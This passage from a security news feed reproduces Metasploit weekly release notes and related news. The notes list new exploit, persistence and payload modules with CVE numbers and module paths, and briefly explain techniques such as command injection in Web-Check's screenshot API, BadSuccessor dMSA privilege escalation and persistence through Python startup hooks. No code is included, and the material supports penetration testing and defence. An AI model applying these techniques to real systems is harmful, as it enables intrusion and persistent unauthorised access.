Code Execution</h3><p>Author: Lukas Johannes Möller </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20810">#20810</a> contributed by <a href="https://github.com/JohannesLks">JohannesLks</a> </p><p>Path: <span data-type="inlineCode">multi/http/n8n_workflow_expression_rce</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-68613&amp;referrer=blog">CVE-2025-68613</a></p><p>Description: This adds a new module for n8n (CVE-2025-68613). The vulnerability is authenticated remote code execution in the workflow expression evaluation engine. The module requires credentials to create a malicious workflow that executes system commands via a JavaScript payload.</p><h3>Web-Check Screenshot API Command Injection RCE</h3><p>Author: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20791">#20791</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: <span data-type="inlineCode">multi/http/web_check_screenshot_rce</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-32778&amp;referrer=blog">CVE-2025-32778</a></p><p>Description: Adds an exploit module for CVE-2025-32778, a command injection vulnerability in Web-Check's screenshot API endpoint which allows unauthenticated remote code execution by injecting shell commands via URL query parameters in the /api/screenshot endpoint.</p><h3>Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key</h3><p>Authors: OJ Reeves and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20751">#20751</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">windows/persistence/accessibility_features_debugger</span></p><p>Description: This updates the Windows sticky keys post persistence module to use the new persistence mixin.</p><h3>WMI Event Subscription Event Log Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">windows/persistence/wmi/wmi_event_subscription_event_log</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>WMI Event Subscription Interval Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">windows/persistence/wmi/wmi_event_subscription_interval</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>WMI Event Subscription Process Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">windows/persistence/wmi/wmi_event_subscription_process</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>WMI Event Subscription Logon Timer Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">windows/persistence/wmi/wmi_event_subscription_uptime</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>Linux Chmod</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20845">#20845</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path: <span data-type="inlineCode">linux/armle/chmod</span> and <span data-type="inlineCode">linux/aarch64/chmod</span></p><p>Description: Adds Linux ARM 32-bit / 64-bit Little Endian chmod payloads.</p><h2>Enhancements and features (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> from <a href="https://github.com/h00die">h00die</a> - Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20751">#20751</a> from <a href="https://github.com/h00die">h00die</a> - This updates the Windows sticky keys post persistence module to use the new persistence mixin.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20785">#20785</a> from <a href="https://github.com/Chocapikk">Chocapikk</a> - This adds Waku framework support to the existing react2shell module. Waku is a minimal React framework which differs slightly compared to Node.js. The module maintains backward compatibility with existing Next.js targets while adding Waku support through a modular framework configuration system.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20786">#20786</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This updates the module code to merge the target Arch and Platform entries into the module's top level data. Prior to this change module developers had to define Arch and Platform entries twice, once at the module level and again per individual target. This updates over 500 modules and removes that duplication.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20796">#20796</a> from <a href="https://github.com/h00die">h00die</a> - This moves the udev persistence into the persistence category and adds the persistence mixin.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20853">#20853</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Bumps metapsloit-payloads to 2.0.239.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20855">#20855</a> from <a href="https://github.com/h00die">h00die</a> - Adds additional ATT&amp;CK references to persistence modules.</li></ul><h2>Bugs fixed (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20738">#20738</a> from <a href="https://github.com/Shubham0699">Shubham0699</a> - This fixes an issue in the bailiwicked DNS modules that was causing the module to fail with a stack trace due to a programming error.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20847">#20847</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - This updates the auxiliary/scanner/ssh/ssh_login module to remove stale documentation, remove unnecessary characters that were printed in the output and update the correct documentation with the new information about key usage.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20665">#20665</a> from <a href="https://github.com/basicallyabidoof">basicallyabidoof</a> - Adds documentation for the ipv6_neighbor_router_advertisement module.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-01-07T06%3A36%3A30-05%3A00..2026-01-14T22%3A53%3A30Z%22">Pull Requests 6.4.106...6.4.107</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.106...6.4.107">Full diff 6.4.106...6.4.107</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution]]></title>
<description><![CDATA[Topic: AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/3220315/poc/avideo-notifyffmpegjsonphp-unauthenticated-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3220315/poc/avideo-notifyffmpegjsonphp-unauthenticated-remote-code-execution/</guid>
<pubDate>Sun, 18 Jan 2026 22:49:25 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 01/16/2025]]></title>
<description><![CDATA[Persistence, dMSA Abuse & RCE GoodiesThis week, we have received a lot of contributions from the community, such as h00die, Chocapikk and countless others, which is greatly appreciated. This week’s modules and improvements in Metasploit Framework range from new modules, such as dMSA Abuse (result...]]></description>
<link>https://tsecurity.de/de/3217902/it-security-nachrichten/metasploit-wrap-up-01162025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3217902/it-security-nachrichten/metasploit-wrap-up-01162025/</guid>
<pubDate>Fri, 16 Jan 2026 20:35:26 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Persistence, dMSA Abuse &amp; RCE Goodies</h2><p>This week, we have received a lot of contributions from the community, such as <a href="https://github.com/h00die">h00die</a>, <a href="https://github.com/Chocapikk">Chocapikk</a> and countless others, which is greatly appreciated. This week’s modules and improvements in Metasploit Framework range from new modules, such as dMSA Abuse (resulting in escalation of privilege in Windows Active Directory environments), authenticated and unauthenticated RCE modules, as well as many improvements and additions to the persistence modules and techniques.</p><h2>New module content (13)</h2><h3>BadSuccessor: dMSA abuse to Escalate Privileges in Windows Active Directory</h3><p>Authors: AngelBoy, Spencer McIntyre, and jheysel-r7 </p><p>Type: Auxiliary </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20472">#20472</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a> </p><p>Path: <span data-type="inlineCode">admin/ldap/bad_successor</span></p><p>Description: This adds an exploit for "BadSuccessor" which is a vulnerability whereby a user with permissions to an Organizational Unit (OU) in Active Directory can create a Delegated Managed Service Account (dMSA) account in such a way that it can lead to the issuance of a Kerberos ticket for an arbitrary user.</p><h3>Control Web Panel /admin/index.php Unauthenticated RCE</h3><p>Authors: Egidio Romano and Lukas Johannes Möller </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20806">#20806</a> contributed by <a href="https://github.com/JohannesLks">JohannesLks</a> </p><p>Path: <span data-type="inlineCode">linux/http/control_web_panel_api_cmd_exec</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-67888&amp;referrer=blog">CVE-2025-67888</a></p><p>Description: This adds a new module for Control Web Panel (CVE-2025-67888). The vulnerability is unauthenticated OS command injection through an exposed API. The modules require Softaculous to be installed.</p><h3>Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload</h3><p>Author: Alexandru Ionut Raducu </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20811">#20811</a> contributed by <a href="https://github.com/Xorriath">Xorriath</a> </p><p>Path: <span data-type="inlineCode">linux/http/prison_management_rce</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2024-48594&amp;referrer=blog">CVE-2024-48594</a></p><p>Description: This adds a new module for Prison Management System 1.0 (CVE-2024-48594). The module requires admin credentials, which are subsequently used to exploit unrestricted file upload to upload a webshell.</p><h3>udev Persistence</h3><p>Author: Julien Voisin </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20796">#20796</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">linux/persistence/udev</span></p><p>Description: This moves the udev persistence module into the persistence category and adds the persistence mixin.</p><h3>n8n Workflow Expression Remote Code Execution</h3><p>Author: Lukas Johannes Möller </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20810">#20810</a> contributed by <a href="https://github.com/JohannesLks">JohannesLks</a> </p><p>Path: <span data-type="inlineCode">multi/http/n8n_workflow_expression_rce</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-68613&amp;referrer=blog">CVE-2025-68613</a></p><p>Description: This adds a new module for n8n (CVE-2025-68613). The vulnerability is authenticated remote code execution in the workflow expression evaluation engine. The module requires credentials to create a malicious workflow that executes system commands via a JavaScript payload.</p><h3>Web-Check Screenshot API Command Injection RCE</h3><p>Author: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20791">#20791</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: <span data-type="inlineCode">multi/http/web_check_screenshot_rce</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-32778&amp;referrer=blog">CVE-2025-32778</a></p><p>Description: Adds an exploit module for CVE-2025-32778, a command injection vulnerability in Web-Check's screenshot API endpoint which allows unauthenticated remote code execution by injecting shell commands via URL query parameters in the /api/screenshot endpoint.</p><h3>Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key</h3><p>Authors: OJ Reeves and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20751">#20751</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">windows/persistence/accessibility_features_debugger</span></p><p>Description: This updates the Windows sticky keys post persistence module to use the new persistence mixin.</p><h3>WMI Event Subscription Event Log Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">windows/persistence/wmi/wmi_event_subscription_event_log</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>WMI Event Subscription Interval Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">windows/persistence/wmi/wmi_event_subscription_interval</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>WMI Event Subscription Process Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">windows/persistence/wmi/wmi_event_subscription_process</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>WMI Event Subscription Logon Timer Persistence</h3><p>Authors: Nick Tyrer &lt;@NickTyrer&gt; and h00die </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> contributed by <a href="https://github.com/h00die">h00die</a> </p><p>Path: <span data-type="inlineCode">windows/persistence/wmi/wmi_event_subscription_uptime</span></p><p>Description: Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</p><h3>Linux Chmod</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20845">#20845</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path: <span data-type="inlineCode">linux/armle/chmod</span> and <span data-type="inlineCode">linux/aarch64/chmod</span></p><p>Description: Adds Linux ARM 32-bit / 64-bit Little Endian chmod payloads.</p><h2>Enhancements and features (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20706">#20706</a> from <a href="https://github.com/h00die">h00die</a> - Updated the Windows WMI to use a new way of managing persistence modules in Metasploit Framework. The Windows WMI module has been split into four modules, each representing their own technique.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20751">#20751</a> from <a href="https://github.com/h00die">h00die</a> - This updates the Windows sticky keys post persistence module to use the new persistence mixin.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20785">#20785</a> from <a href="https://github.com/Chocapikk">Chocapikk</a> - This adds Waku framework support to the existing react2shell module. Waku is a minimal React framework which differs slightly compared to Node.js. The module maintains backward compatibility with existing Next.js targets while adding Waku support through a modular framework configuration system.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20786">#20786</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This updates the module code to merge the target Arch and Platform entries into the module's top level data. Prior to this change module developers had to define Arch and Platform entries twice, once at the module level and again per individual target. This updates over 500 modules and removes that duplication.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20796">#20796</a> from <a href="https://github.com/h00die">h00die</a> - This moves the udev persistence into the persistence category and adds the persistence mixin.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20853">#20853</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Bumps metapsloit-payloads to 2.0.239.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20855">#20855</a> from <a href="https://github.com/h00die">h00die</a> - Adds additional ATT&amp;CK references to persistence modules.</li></ul><h2>Bugs fixed (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20738">#20738</a> from <a href="https://github.com/Shubham0699">Shubham0699</a> - This fixes an issue in the bailiwicked DNS modules that was causing the module to fail with a stack trace due to a programming error.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20847">#20847</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - This updates the auxiliary/scanner/ssh/ssh_login module to remove stale documentation, remove unnecessary characters that were printed in the output and update the correct documentation with the new information about key usage.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20665">#20665</a> from <a href="https://github.com/basicallyabidoof">basicallyabidoof</a> - Adds documentation for the ipv6_neighbor_router_advertisement module.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-01-07T06%3A36%3A30-05%3A00..2026-01-14T22%3A53%3A30Z%22">Pull Requests 6.4.106...6.4.107</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.106...6.4.107">Full diff 6.4.106...6.4.107</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[n8n Workflow Expression Remote Code Execution]]></title>
<description><![CDATA[Topic: n8n Workflow Expression Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/3213718/sicherheitsluecken/n8n-workflow-expression-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3213718/sicherheitsluecken/n8n-workflow-expression-remote-code-execution/</guid>
<pubDate>Wed, 14 Jan 2026 23:34:07 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: n8n Workflow Expression Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 01/09/2026]]></title>
<description><![CDATA[RISC-V PayloadsThis week brings more RISC-V payloads from community member bcoles. One provides a new adapter which allows RISC-V payloads to be converted to commands and delivered as a Metasploit fetch-payload. The second is a classic bind shell, offering the user interactive connectivity to the...]]></description>
<link>https://tsecurity.de/de/3204979/it-security-nachrichten/metasploit-wrap-up-01092026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3204979/it-security-nachrichten/metasploit-wrap-up-01092026/</guid>
<pubDate>Sat, 10 Jan 2026 00:20:20 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>RISC-V Payloads</h2><p>This week brings more RISC-V payloads from community member <a href="https://github.com/bcoles">bcoles</a>. One provides a new adapter which allows RISC-V payloads to be converted to commands and delivered as a Metasploit fetch-payload. The second is a classic bind shell, offering the user interactive connectivity to the target host. Both of these go a long way in improving Metasploit’s support for RISC-V systems.</p><h2>Annual Wrap Up</h2><p>With a new year comes a new annual wrap up. Earlier this week, the Metasploit project <a href="https://www.rapid7.com/blog/post/pt-metasploit-2025-annual-wrap-up/">posted the annual wrap up</a> covering notable changes from 2025.</p><h2>New module content (4)</h2><h3>Taiga tribe_gig authenticated unserialize remote code execution</h3><p>Authors: rootjog and whotwagner </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20700">#20700</a> contributed by <a href="https://github.com/whotwagner">whotwagner</a> </p><p>Path: <span data-type="inlineCode">multi/http/taiga_tribe_gig_unserial</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-62368&amp;referrer=blog">CVE-2025-62368</a></p><p>Description: This adds a new module for authenticated deserialization vulnerability in Taiga.io (CVE-2025-62368). The module sends malicious data to exposed API, which performs unsafe deserialization, leading to remote code execution.</p><h3>Python Site-Specific Hook Persistence</h3><p>Author: msutovsky-r7 </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20692">#20692</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> </p><p>Path: <span data-type="inlineCode">multi/persistence/python_site_specific_hook</span></p><p>Description: This adds a persistence module which leverages Python's startup mechanism, where some files can be automatically processed during the initialization of the Python interpreter. Someof those files are startup hooks (site-specific, dist-packages). If these files are present in site-specific or dist-packages directories, any lines beginning with import will be executed automatically. This creates a persistence mechanism if an attacker has established access to the target machine with sufficient permissions.</p><h3>Add Linux RISC-V command payload adapters</h3><p>Authors: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> </p><p>Type: Payload (Adapter) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20734">#20734</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Description: This extends fetch payloads for RISC-V targets.</p><h3>Linux Command Shell, Bind TCP Inline</h3><p>Authors: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> and modexp </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20733">#20733</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path: <span data-type="inlineCode">linux/riscv32le/shell_bind_tcp</span></p><p>Description: This adds a new payload: a bind shell for Linux RISC-V targets.</p><h2>Bugs fixed (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20370">#20370</a> from <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> - Fixes an issue that occurred when negotiating the SMB version and the server uses an unknown dialect. Now, the login function will throw an exception and exit gracefully.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20744">#20744</a> from <a href="https://github.com/ptrstr">ptrstr</a> - This fixes a bug in unix/webapp/wp_reflexgallery_file_upload where the current year and month were being hardcoded in the request. This caused the server to reject the exploit if there was no folder in wp-content/uploads for that specific year and month. Now the year and month are configurable datastore options.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20831">#20831</a> from <a href="https://github.com/DataExplorerX">DataExplorerX</a> - This adds link to issues in Metasploit Framework Github repository.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-12-30T13%3A59%3A48Z..2026-01-07T06%3A36%3A30-05%3A00%22">Pull Requests 6.4.105...6.4.106</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.105...6.4.106">Full diff 6.4.105...6.4.106</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Recently fixed HPE OneView flaw is being exploited (CVE-2025-37164)]]></title>
<description><![CDATA[An unauthenticated remote code execution vulnerability (CVE-2025-37164) affecting certain versions of HPE OneView is being leveraged by attackers, CISA confirmed by adding the flaw to its Known Exploited Vulnerabilities catalog. The vulnerability’s inclusion in the catalog is unsurprising, as tec...]]></description>
<link>https://tsecurity.de/de/3202003/it-security-nachrichten/recently-fixed-hpe-oneview-flaw-is-being-exploited-cve-2025-37164/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3202003/it-security-nachrichten/recently-fixed-hpe-oneview-flaw-is-being-exploited-cve-2025-37164/</guid>
<pubDate>Thu, 08 Jan 2026 15:21:01 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An unauthenticated remote code execution vulnerability (CVE-2025-37164) affecting certain versions of HPE OneView is being leveraged by attackers, CISA confirmed by adding the flaw to its Known Exploited Vulnerabilities catalog. The vulnerability’s inclusion in the catalog is unsurprising, as technical details and a Metasploit module were made public soon after it was disclosed, making exploitation by less-skilled attackers easier. About HPE OneView and CVE-2025-37164 HPE OneView is a centralized infrastructure management platform used to deploy, … <a href="https://www.helpnetsecurity.com/2026/01/08/hpe-oneview-cve-2025-37164-exploited/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/01/08/hpe-oneview-cve-2025-37164-exploited/">Recently fixed HPE OneView flaw is being exploited (CVE-2025-37164)</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Proaktive IT-Security mit Pentesting: Ethical Hacking für Admins | heise online]]></title>
<description><![CDATA[Ein besonderer Fokus liegt auf dem Exploit-Framework Metasploit, mit dem Hacker identifizierte Schwachstellen gezielt ausnutzen. Härtung interner und ...]]></description>
<link>https://tsecurity.de/de/3197118/hacking/proaktive-it-security-mit-pentesting-ethical-hacking-fuer-admins-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3197118/hacking/proaktive-it-security-mit-pentesting-ethical-hacking-fuer-admins-heise-online/</guid>
<pubDate>Tue, 06 Jan 2026 11:36:35 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein besonderer Fokus liegt auf dem Exploit-Framework Metasploit, mit dem <b>Hacker</b> identifizierte Schwachstellen gezielt ausnutzen. Härtung interner und ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit 2025 Annual Wrap-Up]]></title>
<description><![CDATA[Hard to believe it's that time again, and that Metasploit Framework will see the dawn of another Annual Wrap-Up (and a New Year). All of the metrics and modules you see here would in large part not be possible without the dedicated community members who care about the Framework and its mission on...]]></description>
<link>https://tsecurity.de/de/3195989/it-security-nachrichten/metasploit-2025-annual-wrap-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3195989/it-security-nachrichten/metasploit-2025-annual-wrap-up/</guid>
<pubDate>Mon, 05 Jan 2026 22:53:49 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hard to believe it's that time again, and that Metasploit Framework will see the dawn of another Annual Wrap-Up (and a New Year). All of the metrics and modules you see here would in large part not be possible without the dedicated community members who care about the Framework and its mission on all the days of the year. It is their hard work and dedication that makes it look like magic, and sometimes, it feels like it too. A heartfelt thank you to all of our researchers and contributors, you're what makes Metasploit Framework so resilient.</p><p>This year brought its share of notable vulnerabilities, substantial framework improvements, and continued evolution of the project. Whether you submitted a module, filed an issue, or helped triage a bug, your contributions have kept Metasploit relevant and powerful. So without further ado, let's dive into the highlights from 2025.</p><h2>Persistence Overhaul</h2><p>One of the year's significant infrastructure improvements came from community contributor h00die, who spearheaded a massive refactor of Metasploit's persistence modules. The project, tracked in issue <a href="https://github.com/rapid7/metasploit-framework/issues/20374">#20374</a>, involved reorganizing dozens of persistence modules from their scattered locations across the framework into a dedicated persistence directory under exploits. This wasn't just housekeeping—h00die created a standardized persistence mixin that brought consistency to how modules handle installation, cleanup, and option handling. The refactor touched over 30 modules spanning Linux, Windows, OSX, and multi-platform techniques, modernizing each one with proper check methods, MITRE ATT&amp;CK references, and standardized options like WritableDir. The work also laid the groundwork for a persistence suggester module that can automatically recommend viable persistence techniques based on session 